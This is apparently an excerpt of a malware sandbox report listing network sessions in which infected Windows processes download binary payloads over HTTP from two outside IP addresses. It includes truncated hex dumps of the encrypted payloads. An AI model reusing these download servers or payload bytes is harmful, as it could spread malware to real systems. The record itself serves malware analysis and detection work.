                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                               May 8, 2024 15:24:24.062493086 CEST | 167 | OUT | GET /_3 HTTP/1.1
                                                                               User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                               Host: 185.215.113.66
                                                                               May 8, 2024 15:24:24.408998966 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:24 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Tue, 07 May 2024 18:30:44 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663a7354-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                               May 8, 2024 15:24:24.409182072 CEST | 1289 | IN | Data Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                               Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                               May 8, 2024 15:24:24.409221888 CEST | 1289 | IN | Data Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                               Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                               May 8, 2024 15:24:24.409239054 CEST | 1289 | IN | Data Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                               Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q
                                                                               May 8, 2024 15:24:24.409734964 CEST | 1289 | IN | Data Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                               Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                               May 8, 2024 15:24:24.409749031 CEST | 1289 | IN | Data Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                               Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                               May 8, 2024 15:24:24.409843922 CEST | 1289 | IN | Data Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
                                                                               Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                               May 8, 2024 15:24:24.409858942 CEST | 465 | IN | Data Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                               Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB


                                                                               Session ID: 30 | Source: 192.168.2.8:49757 | Destination: 185.215.113.66:80 | PID: 5588 | Process: C:\Windows\sysbrapsvc.exe
                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                               May 8, 2024 15:24:24.503726959 CEST | 166 | OUT | GET /5 HTTP/1.1
                                                                               User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                               Host: 185.215.113.66
                                                                               May 8, 2024 15:24:24.843621969 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:24 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 8960
                                                                              Last-Modified: Mon, 06 May 2024 15:56:03 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "6638fd93-2300"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 6e 7d d2 5f ce 4a 45 f2 2e c8 0a 06 01 ad 79 a1 63 76 36 9c 33 9d 4c 75 74 4a ce 78 8a 3c ef f0 d5 e4 b0 26 52 79 67 45 ad 70 d3 3a 4b 36 01 0e c6 16 f8 71 c8 1a 6a e2 64 71 7e b1 1a b9 f6 f8 f9 38 23 3c 26 8e 19 a9 67 be 75 d4 b0 b3 ee 7e 56 8d c9 d6 b2 19 08 98 9c 62 5d 08 84 18 e0 a4 81 52 52 f1 22 2d 57 91 35 b1 be bf 00 34 54 15 7a 9f 37 5a 41 a7 67 fd f5 f0 19 bc cb 4d 5d 3b 33 55 47 d7 29 48 84 09 d2 35 61 aa 27 75 84 62 9b 91 c9 fc d8 ab f6 d3 13 57 89 3f 95 ab 64 63 e7 73 c5 5e 05 a5 42 e3 0f 60 42 17 f5 88 3b 8c 25 27 7a 85 fa 04 37 4a f5 68 71 6d 2b 8a 84 61 c2 56 01 36 4f f4 55 cc fc 6b ff 18 a6 02 24 ce 28 d3 a3 ee 8d ef d1 4b 66 64 4b 50 7b ae d7 0c db 98 be e6 d7 4d 22 0d 84 e4 73 47 48 6f f3 f6 ce cb 17 4c 5d f2 e4 99 c3 e4 ef b5 2d 3d 28 e3 2f c2 fc a5 dc 8a c6 15 02 ae 33 6c f0 40 61 05 5b 9c 9f a9 81 6f 78 43 b8 d7 ca 55 ea 3c 2d c6 35 ea e5 78 8b 82 f5 67 d9 dc eb 87 ef 5c 2a 3d 82 67 a4 20 42 ba a1 a9 6e 52 5a b2 74 d1 ff 58 7d 97 69 5f d5 2e dd 2d 9b 94 06 26 3a 55 d4 63 0c 97 [TRUNCATED]
                                                                              Data Ascii: n}_JE.ycv63LutJx<&RygEp:K6qjdq~8#<&gu~Vb]RR"-W54Tz7ZAgM];3UG)H5a'ubW?dcs^B`B;%'z7Jhqm+aV6OUk$(KfdKP{M"sGHoL]-=(/3l@a[oxCU<-5xg\*=g BnRZtX}i_.-&:UcRSTud^3n<YyiiIetwjEJIe9n[~RTz~-g eKqBga-2bgeG\Kk-M5668Gjj+N<"AY<A0PMXZdlLPVevy2lHS2>Nn<p5q7Rpet \w\3]OzWt\<7$Z/BNeoq#q4V5r0%)-`9u%:oF8Li~}WJ3VV0}4tVT[O+27Gt!rn<DI3KI=0FlLW~^'.Am~U<lab+GIJrKEf`.0t}0^"q';1q1?n=*:NOrsGDjw_Hi`DkkHjAfi\&y57v~$~H [TRUNCATED]
                                                                               May 8, 2024 15:24:24.843640089 CEST | 1289 | IN | Data Raw: f7 94 da 7b e6 b6 fe 0f a6 64 19 c2 ef 0c 25 ba 8a dc 2e e0 30 f4 54 50 75 d1 a6 f4 59 1c b4 b9 d6 5d ff c8 5e 3e 5b 07 7a 96 73 9b ae 22 d8 6b 94 c6 57 3e d8 71 a6 7b 47 b5 fd bf db f8 4c d1 a0 dc 40 6d 3e 69 9d 81 d1 0a 59 7c bc 21 67 cc 11 6c
                                                                               Data Ascii: {d%.0TPuY]^>[zs"kW>q{GL@m>iY|!gl.8D4JG?x/\@D;=(-Z!fH^;7|+$=zzC-dyfm3UW:eZP}c\i[^]:_((<E26+W]
                                                                               May 8, 2024 15:24:24.843713999 CEST | 1289 | IN | Data Raw: 36 b6 60 d6 42 d5 be b8 10 0f 5e 53 6b 05 0c bb e0 3a fd c1 4c da c6 b2 ce 72 f2 28 ff e2 e4 db da 87 14 d0 4f 41 0e 55 57 fa be d2 25 4d 12 33 a4 70 68 6c 6c 2b a3 44 06 79 cc 95 93 eb 72 2a b2 f0 3b de cd b0 3a c3 dc 34 b8 c3 7d 7f 3e 04 b4 75
                                                                               Data Ascii: 6`B^Sk:Lr(OAUW%M3phll+Dyr*;:4}>u)xA*r\IAc:X1v".&9>^Q!4D "Ifh`(^+O1YPMZk(*x6nsclZ28_o0 k@!HuyA
                                                                               May 8, 2024 15:24:24.843729019 CEST | 1289 | IN | Data Raw: 93 f1 1e 94 53 39 c9 d2 e2 09 21 6e 04 82 7e 50 d7 b3 b4 7a 0f 0c 6e f7 f3 72 9f 81 e7 4f 18 63 7d f3 82 53 8a c0 24 d3 f8 5f e5 bf 54 41 82 a4 fd fd 43 2d f5 13 2e c4 5b 9d f3 91 c6 f4 2e 55 bd e6 d6 75 a2 c3 d0 94 74 c8 cb 28 b6 dc f0 93 b5 29
                                                                               Data Ascii: S9!n~PznrOc}S$_TAC-.[.Uut()w~oLYj=e|qRaf;\o*FsJUS~T,om^&)Nh0/(Fy0qC4AOPp/iP?b4k"/8:V,p#$S=+
                                                                               May 8, 2024 15:24:24.843743086 CEST | 1289 | IN | Data Raw: 33 51 0b bf 02 90 7d ae a0 4a f2 d7 4e 24 7a af 58 7f 8c 57 b1 0b ba f7 ad e3 5e a3 5c e2 17 41 70 26 55 dd e1 15 18 42 00 13 72 95 8a e6 0e bd 09 e1 cc 12 1d 94 48 d8 7f 9a a1 3a f8 a8 cd 4e 93 44 96 32 4d c1 d3 0f 72 e9 7c 3f f8 63 58 4c c1 64
                                                                               Data Ascii: 3Q}JN$zXW^\Ap&UBrH:ND2Mr|?cXLdydQ]X4&S{81eJE0]'k?mvv@Z|Bm9+7qd=Sf&x5h_VS>i2J(I-#$4V0
                                                                               May 8, 2024 15:24:24.843758106 CEST | 1289 | IN | Data Raw: 75 f2 a4 6e 8c 81 1a ce 92 da 4e 55 fe 12 bc 9a 1d 07 16 a6 2c bb f4 14 e5 47 0e 5a ef 01 75 2d ca 7b 4a 24 d7 7f 58 3b f8 05 9d ad 36 f6 0e 9b 79 24 3d a3 86 9b 25 40 e7 93 e1 8a 71 37 ce 6a e1 85 1b d8 41 0b 62 b1 13 8e f5 76 e9 fe 55 d1 d5 ad
                                                                               Data Ascii: unNU,GZu-{J$X;6y$=%@q7jAbvU#i=a=7C(qPt]*:u0-/G3n~ulB41Q*txp{-M*u8H_8`<,d(,r*h8zG30J<W@zb
                                                                               May 8, 2024 15:24:24.843832970 CEST | 1289 | IN | Data Raw: 22 8e fe 4a ef 62 4e fb 52 d3 10 f6 27 c8 5a 0d 9d 1d 25 85 59 6d 73 a2 2f f1 99 3c 63 a3 86 05 ed 4f 9d 19 fc 5b 79 4c 9c 5d b0 b8 13 8f c1 7b f3 b0 4b c7 c7 1a 66 c4 e8 67 59 56 e9 a8 38 19 67 57 78 8a eb f9 39 3e 92 c1 ed 14 f1 fe 1f 11 e3 ac
                                                                               Data Ascii: "JbNR'Z%Yms/<cO[yL]{KfgYV8gWx9>_tM~Q^>%\-WTTNzroS5]j9G$J,)govS8}BeW9kF,};P.2AE$!t`Gnx\pB
                                                                               May 8, 2024 15:24:24.843846083 CEST | 201 | IN | Data Raw: 81 31 21 d8 8e 36 78 b3 2d 82 77 69 8a df 7e 62 18 45 06 17 54 88 d6 0a 13 39 f8 83 01 5f 60 e5 2f e2 a3 e1 ad 97 41 c3 f3 ff 04 87 45 be a8 6c b3 32 c4 02 f6 a3 27 6b b3 e7 12 44 a7 58 da 60 98 22 14 cc 06 3f 84 e5 8b 84 0c 98 a8 be 53 a5 2f 6a
                                                                               Data Ascii: 1!6x-wi~bET9_`/AEl2'kDX`"?S/jeUA?bkXwY;HzObN6<2%8bp2ePK1f:Kd$\kvjZz,{


                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                               31 | 192.168.2.8 | 49758 | 185.215.113.66 | 80 | 5588 | C:\Windows\sysbrapsvc.exe
                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                               May 8, 2024 15:24:27.497114897 CEST | 166 | OUT | GET /6 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                               May 8, 2024 15:24:27.836029053 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:27 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 11520
                                                                              Last-Modified: Sat, 04 May 2024 13:18:06 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "6636358e-2d00"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4d 69 d1 66 af 90 ca ef 04 18 04 8f 9a 4f 78 79 a1 72 45 cd 89 72 d1 57 c0 33 c8 d8 28 db 5b 31 72 fa ec 98 3c 67 3f a8 16 70 92 cc 17 52 3d bb 9c 7b 03 65 25 32 e0 f5 c9 73 9d f1 c1 03 8b 8e 35 d8 88 02 5c 9e 73 f4 5b 07 c1 59 15 e9 c6 f5 e9 ef ad d9 43 18 62 a0 a9 2f 0a 3e 55 89 eb 57 0d 52 27 a6 07 3a 8b a9 bf 6c 43 a0 c6 ec 73 86 2c 9e 66 7d 06 e8 29 fd 4f 06 ba 83 84 25 5e 77 3e ad 2f e6 c8 42 af 31 8c 99 1e c4 f3 8d d4 94 d6 e0 12 42 3f ef 15 eb 39 c4 ff 0d a7 86 c6 e5 10 fc 73 6e ab 62 92 c2 cd 28 06 90 55 e6 71 50 2b 89 99 62 40 9b 39 d1 35 82 0d 31 00 b7 89 c9 29 bb 7d ec b0 ea 71 90 84 34 1d b7 73 e9 b8 4f 66 ae ce b1 f4 c6 6b 53 a3 c4 e2 b8 1a 13 69 8d 8d c5 6e 29 c8 3e 7c 53 2f 76 35 46 20 d0 37 48 e0 81 55 8c 36 e9 2e c7 17 43 32 30 71 9e 05 33 43 0d ba 30 31 91 e7 98 12 0b ba 93 dd 00 de 30 fd 0f 7c 5a 37 06 55 11 28 6f 92 5e b5 c8 f4 c0 78 2a c2 0a fd 4a 0c f8 13 b4 58 8e e9 79 4d 99 7a 1c 94 f8 12 84 db 8c 82 fd 3a 97 f0 92 23 5e 84 cb 02 45 5b 00 bb 11 d2 71 33 9b 87 c5 d8 f7 ce 18 [TRUNCATED]
                                                                              Data Ascii: MifOxyrErW3([1r<g?pR={e%2s5\s[YCb/>UWR':lCs,f})O%^w>/B1B?9snb(UqP+b@951)}q4sOfkSin)>|S/v5F 7HU6.C20q3C010|Z7U(o^x*JXyMz:#^E[q3L\?w5T_ZA#[jqUyG )1a]rbwlZQuafbnpn3,k#k!rqB9O8XY%pQfC8GDoyPyWo?!/nZzK|C[-EgEeGpwuyh%,5GjJP!mmHQr)oVJ<Wh#<"Tf+8}K4&sR'{nLgu9NYRs^sA7G2mI8Yj{*%aU=Xg&TRg&B5wiroW+8dlnrthwID&4P"T@Uj'E_rMzAl!F}fsunfb3#C4&@@G1 ioC,WAZw.d3!LsF= ?T{ R*M]V?:HK//|f"?6edfIM"3\Dys:yKhNFwY"oQtyFt9t:" [TRUNCATED]
                                                                               May 8, 2024 15:24:27.836129904 CEST | 1289 | IN | Data Raw: fb 97 3d 42 70 69 f4 d0 6a d4 64 5d a9 23 47 e7 52 a7 c1 d7 43 8f cf 0d 5b 9a aa 34 1e 7a 10 5f ac 61 5b 0a 44 53 86 32 fc 6b 44 b6 49 0a c7 40 06 33 92 a6 5d 6c 1e 63 f7 06 96 6e 19 64 25 51 78 ac 38 7c 66 e1 8d 97 78 f2 9d 59 03 21 60 8e 4e 9a
                                                                              Data Ascii: =Bpijd]#GRC[4z_a[DS2kDI@3]lcnd%Qx8|fxY!`N5zm"@%hlTz?g4Da:2\iTe.AD$F=u<N<>L%Acf5"-+"Zhb'6Y-b<D0Hn6S#}2qV!jVe&yPyXC*
                                                                               May 8, 2024 15:24:27.836144924 CEST | 1289 | IN | Data Raw: 1a 46 bb ff b1 fa 98 44 c5 18 6c 9e 0d ec 06 f9 44 ad ac 14 68 8e 3c 37 c7 63 f7 ba f9 8e 1b 7d 54 ce d3 2c 5b d2 fc 55 f9 78 94 81 b2 1f a7 3a b6 3c ec 69 e6 35 7c 15 79 48 36 d9 9e 73 0a 15 67 8d 1f 32 00 43 7d f6 90 4e 5b d7 bf 3b 6d 8a c6 0d
                                                                              Data Ascii: FDlDh<7c}T,[Ux:<i5|yH6sg2C}N[;mPTHNCSQwcXpRwDF1[^3LTk6QgGt,C`bO?FE`;,fdBlJ1$z/AhCZTK~*KBK<}r5uJ^
                                                                               May 8, 2024 15:24:27.836158037 CEST | 1289 | IN | Data Raw: d6 7d f5 5f d9 ad a7 b3 48 ed 48 0f ed d0 a6 96 e0 05 f7 34 23 65 b6 2a 32 d5 2b 99 9e 59 e7 a9 c2 a3 a2 1e 4b aa 64 c1 ae 4e b8 34 7b 57 88 1d d0 92 ef 80 86 9d e5 82 de 2c 4b 34 03 65 a1 e8 4a ba 91 c0 a7 02 74 37 db ea aa 60 a0 a4 7a 12 0d 6d
                                                                              Data Ascii: }_HH4#e*2+YKdN4{W,K4eJt7`zmZ5UG?RN'Oio?b[AEvS&;=YFj"a_Y**'ih5T4DrE:o^D0C,cyxD~KlE,P/'mP~S
                                                                               May 8, 2024 15:24:27.836173058 CEST | 1289 | IN | Data Raw: 40 9d 2f 40 92 1d dc 2e 2d 37 07 95 c0 ca 27 b3 45 f9 db 57 cc 3c b3 94 3c 1c 6e a7 f9 03 68 03 f9 94 26 62 55 3d d2 84 91 a2 08 81 a0 cf 06 ad 0a 96 5d 18 4d 46 d5 71 52 28 c2 23 ad 04 c6 9e 13 96 5a df 9d 4a 31 8a 0d 44 89 cd 7a 9e 0a 4b af 79
                                                                              Data Ascii: @/@.-7'EW<<nh&bU=]MFqR(#ZJ1DzKyZ~s^V,j{OZ|4Mi{0X~xLSITC[H{X4obLUFSYCA[kW0ym9_"^^%D8RL4/!~=\MIDW.xtL<7QH2
                                                                               May 8, 2024 15:24:27.836184978 CEST | 1289 | IN | Data Raw: 44 4d a6 a3 b7 22 c2 5b 9f 42 16 aa a0 54 8e 79 60 78 63 27 93 c8 7b 4f 79 c4 39 e2 83 37 c6 3c 77 b6 6f c5 bd 55 c4 dd af 2f d6 8e 19 0b 89 c3 74 7c e8 62 ed 59 e0 3d f9 9f f6 a4 01 1a db e9 8e c3 a0 08 ab b1 db ce c5 be 6b 2e c1 21 3d 3b 72 f6
                                                                              Data Ascii: DM"[BTy`xc'{Oy97<woU/t|bY=k.!=;r\&q9C_SfNHUFANxjH{0FX#pyzcL(&5FGv@OJu$u;.:Kr3{Ys'~40.gW9-p
                                                                               May 8, 2024 15:24:27.836199045 CEST | 1289 | IN | Data Raw: 96 c7 1e 99 2a 65 47 5a 2f 04 61 95 c3 f7 3b 13 2d 1f 19 99 60 44 70 cc 71 89 26 ce fe 61 07 db 08 67 7b ef 72 66 48 9c 03 5c 52 eb 77 87 ba e0 6c 75 f8 82 5e 71 cc 4e 93 81 a7 97 ee d8 22 7d fd 87 70 04 2c 56 52 7b 5c c1 82 64 36 3b 23 11 5b 64
                                                                              Data Ascii: *eGZ/a;-`Dpq&ag{rfH\Rwlu^qN"}p,VR{\d6;#[dRuuo5h{.pQajc}hqR';C@{F#O8rlES06QI,W|<#wF%\3'J,|pi-]D
                                                                               May 8, 2024 15:24:27.836211920 CEST | 1289 | IN | Data Raw: ad 00 b0 d7 3a 66 4e 1e 03 44 ca 9a 69 86 81 3d 7b 3e 74 3d 11 a0 40 8a b0 4a ec 07 f1 39 3a c3 8a 08 fe 9a 04 56 91 cb 6e 0b b7 3d 71 77 1a ab 17 c8 b2 a1 13 f0 84 da c4 a6 3d 8b 0e b7 48 c2 70 8b 3d 79 0b 7b d0 83 40 bc 6e 63 e0 65 3c eb 92 7d
                                                                              Data Ascii: :fNDi={>t=@J9:Vn=qw=Hp=y{@nce<}K;m)2<+)}R|KG#Hp;+q-a+PG V(:2\%D#v_=Vcf~t*UszjG,Hj|kwD^J[2;
                                                                               May 8, 2024 15:24:27.836225033 CEST | 1289 | IN | Data Raw: 4a fc ac 2a f0 d4 7f 4b 5b 5e d3 b6 bb f2 53 4c 5a 65 a8 db fd c0 16 ef fa 31 99 22 f9 0c fc 39 a7 0a 63 e4 67 bf a5 a8 22 34 1f 1a 3e 8f 8b 2c 95 d1 b2 2f 63 fb d3 8c b1 e4 9b d3 5c f8 a4 85 be 1f 12 ae 72 d5 58 85 43 52 e6 38 c2 6f 80 6d 00 79
                                                                              Data Ascii: J*K[^SLZe1"9cg"4>,/c\rXCR8omy*DoBpxA|l;)/m:O[]n&A=+a#c7vC#c&UQXZa.J_ana^-:V:jdx+.<K="uR`*2SY
                                                                               May 8, 2024 15:24:27.836236000 CEST | 184 | IN | Data Raw: 62 6b e6 21 ab a9 eb e8 9e 02 55 78 11 38 01 35 39 77 e9 44 37 e2 1d f0 1e a9 4c 4a ab 33 4c eb 41 0e 7e b2 f2 cb 7b c4 d9 0a 53 01 ea 34 e0 60 75 f2 6c 58 bc 8e db 3d 9d 02 23 ac bf af 98 e0 41 25 68 5a 3d a9 69 92 af 5f 51 c7 ca 1d de fa 66 d1
                                                                              Data Ascii: bk!Ux859wD7LJ3LA~{S4`ulX=#A%hZ=i_Qf]J`7LO/6o.?n-;K/:W$[G}coB%9lA=Nj@E_*+q{@:'W1pfe


                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                               32 | 192.168.2.8 | 49759 | 91.202.233.141 | 80 | 2060 | C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                               May 8, 2024 15:24:27.903503895 CEST | 167 | OUT | GET /_1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                               May 8, 2024 15:24:28.262655020 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:28 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                               Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                                                               May 8, 2024 15:24:30.294775009 CEST | 167 | OUT | GET /_2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                               May 8, 2024 15:24:30.652537107 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:30 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
